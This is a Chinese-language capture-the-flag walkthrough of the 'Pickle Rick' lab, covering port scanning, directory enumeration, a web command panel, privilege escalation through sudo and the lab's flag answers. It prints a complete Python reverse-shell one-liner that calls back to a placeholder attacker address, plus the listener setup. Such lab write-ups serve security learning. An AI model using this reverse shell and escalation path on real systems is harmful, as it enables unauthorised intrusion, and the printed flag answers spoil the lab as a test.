Pickle Rick
🥺

Pickle Rick

Published
March 27, 2023
Category
Write-Up
Subcategory
渗透测试方法与策略
渗透测试案例与实践
Tags
Web
Author
HZH
Notes

1、端口扫描

──(root💀kali)-[/home/hzh/桌面] └─# nmap -p- -sC -sV -T4 10.10.192.126 Starting Nmap 7.91 ( https://nmap.org ) at 2023-03-27 19:59 CST Nmap scan report for 10.10.192.126 Host is up (0.40s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 af:e2:3f:8b:e4:e4:95:60:a7:ae:e1:14:26:af:3c:ed (RSA) | 256 25:0d:29:32:47:dd:2d:ec:86:66:08:b1:63:cd:78:6f (ECDSA) |_ 256 d8:85:fe:42:1c:8c:f9:d5:31:de:a4:6a:82:e4:ae:42 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Rick is sup4r cool Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 954.13 seconds
可以看到该网站开放了80端口和22端口,我们首先查看80端口通过Apache而部署的web服务。
 

2、Web站点

先使用gobuster工具对该网站进行目录探测
──(root💀kali)-[/usr/share/wordlists/dirbuster] └─# gobuster dir -u http://10.10.192.126 -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt -o output.txt =============================================================== Gobuster v3.5 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.192.126 [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-1.0.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.5 [+] Timeout: 10s =============================================================== 2023/03/27 20:42:08 Starting gobuster in directory enumeration mode =============================================================== /index.html /robots.txt /login.php
notion image
先对网站的代码进行审计,发现存在用户名,现在再进入到我们之前通过gobuster爆破出来的robots.txt网页中,发现了一串疑似密码的字符串。
再进入到/login.php页面中,使用该用户名和密码进行登录。
登入后,发现可以有一个命令执行的窗口,通过python来获得反弹shell
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("YOUR_IP_ADDRESS",YOUR_PORT_NUMBER));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
  • "YOUR_IP_ADDRESS"使用你自己的IP地址
  • “YOUR_PORT_NUMBER”使用你自己的端口号
然后在自己终端只用netcat工具来进行监听,以获得返回后的shell
┌──(root💀kali)-[/home/hzh/桌面] └─# nc -lvp 4444 listening on [any] 4444 ... 10.10.192.126: inverse host lookup failed: Unknown host connect to [10.4.19.255] from (UNKNOWN) [10.10.192.126] 38010 /bin/sh: 0: can't access tty; job control turned off $ python3 -c 'import pty; pty.spawn("/bin/bash")' www-data@ip-10-10-192-126:/var/www/html$
在这里,为了获得更好的阅读体验,我们使用pty(Pseudo Terminal)来获得一个终端
查看当前目录,打印Ingred文件
www-data@ip-10-10-192-126:/var/www/html$ ls -al ls -al total 40 drwxr-xr-x 3 root root 4096 Feb 10 2019 . drwxr-xr-x 3 root root 4096 Feb 10 2019 .. -rwxr-xr-x 1 ubuntu ubuntu 17 Feb 10 2019 Sup3rS3cretPickl3Ingred.txt drwxrwxr-x 2 ubuntu ubuntu 4096 Feb 10 2019 assets -rwxr-xr-x 1 ubuntu ubuntu 54 Feb 10 2019 clue.txt -rwxr-xr-x 1 ubuntu ubuntu 1105 Feb 10 2019 denied.php -rwxrwxrwx 1 ubuntu ubuntu 1062 Feb 10 2019 index.html -rwxr-xr-x 1 ubuntu ubuntu 1438 Feb 10 2019 login.php -rwxr-xr-x 1 ubuntu ubuntu 2044 Feb 10 2019 portal.php -rwxr-xr-x 1 ubuntu ubuntu 17 Feb 10 2019 robots.txt www-data@ip-10-10-192-126:/var/www/html$ cat Su cat Sup3rS3cretPickl3Ingred.txt mr. meeseek hair www-data@ip-10-10-192-126:/var/www/html$
切换到home目录下,可以看到用户名为rick的目录,进入该目录得到第二个线索
www-data@ip-10-10-192-126:/home$ ls -al ls -al total 16 drwxr-xr-x 4 root root 4096 Feb 10 2019 . drwxr-xr-x 23 root root 4096 Mar 27 11:48 .. drwxrwxrwx 2 root root 4096 Feb 10 2019 rick drwxr-xr-x 4 ubuntu ubuntu 4096 Feb 10 2019 ubuntu www-data@ip-10-10-192-126:/home$ cd rick cd rick www-data@ip-10-10-192-126:/home/rick$ ls -al ls -al total 12 drwxrwxrwx 2 root root 4096 Feb 10 2019 . drwxr-xr-x 4 root root 4096 Feb 10 2019 .. -rwxrwxrwx 1 root root 13 Feb 10 2019 second ingredients www-data@ip-10-10-192-126:/home/rick$ cat second ingredients </rick$ cat second\ ingredients second\ ingredients 1 jerry tear www-data@ip-10-10-192-126:/home/rick$
下一个文件,在/root目录下,这意味着我们需要提升自己的权限,使用sudo -l命令来列出当前用户(或指定用户)可以使用 sudo 命令执行的命令及权限。
www-data@ip-10-10-192-126:/home/rick$ sudo -l sudo -l Matching Defaults entries for www-data on ip-10-10-192-126.eu-west-1.compute.internal: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User www-data may run the following commands on ip-10-10-192-126.eu-west-1.compute.internal: (ALL) NOPASSWD: ALL
使用 sudo bash -i 来返回一个具有root权限的可交互终端
www-data@ip-10-10-192-126:/home/rick$ sudo bash -i sudo bash -i root@ip-10-10-192-126:/home/rick# cd /root cd /root root@ip-10-10-192-126:~# ls -al ls -al total 28 drwx------ 4 root root 4096 Feb 10 2019 . drwxr-xr-x 23 root root 4096 Mar 27 11:48 .. -rw-r--r-- 1 root root 3106 Oct 22 2015 .bashrc -rw-r--r-- 1 root root 148 Aug 17 2015 .profile drwx------ 2 root root 4096 Feb 10 2019 .ssh -rw-r--r-- 1 root root 29 Feb 10 2019 3rd.txt drwxr-xr-x 3 root root 4096 Feb 10 2019 snap root@ip-10-10-192-126:~# cat 3rd.txt cat 3rd.txt 3rd ingredients: fleeb juice root@ip-10-10-192-126:~#
ddd
ddd